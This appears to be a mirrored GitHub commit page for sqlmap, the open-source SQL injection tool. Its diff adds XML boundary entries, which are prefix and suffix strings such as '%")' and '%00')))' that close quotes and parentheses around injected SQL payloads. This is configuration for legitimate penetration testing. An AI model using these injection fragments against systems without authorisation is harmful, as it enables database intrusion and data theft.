mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-29 04:53:48 +03:00
some more boundaries
This commit is contained in:
parent
204ee1db39
commit
43f6cb1508
|
@ -328,6 +328,42 @@ Formats:
|
|||
<suffix> AND '%'='</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%")</prefix>
|
||||
<suffix> AND ("%"="</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%"))</prefix>
|
||||
<suffix> AND (("%"="</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%")))</prefix>
|
||||
<suffix> AND ((("%"="</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%"</prefix>
|
||||
<suffix> AND "%"="</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
|
@ -337,6 +373,24 @@ Formats:
|
|||
<suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%00'))</prefix>
|
||||
<suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%00')))</prefix>
|
||||
<suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
|
@ -354,6 +408,15 @@ Formats:
|
|||
<prefix></prefix>
|
||||
<suffix>-- [RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix></prefix>
|
||||
<suffix># [RANDSTR]</suffix>
|
||||
</boundary>
|
||||
<!-- End of WHERE/HAVING clause boundaries -->
|
||||
|
||||
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
|
||||
|
|
Loading…
Reference in New Issue
Block a user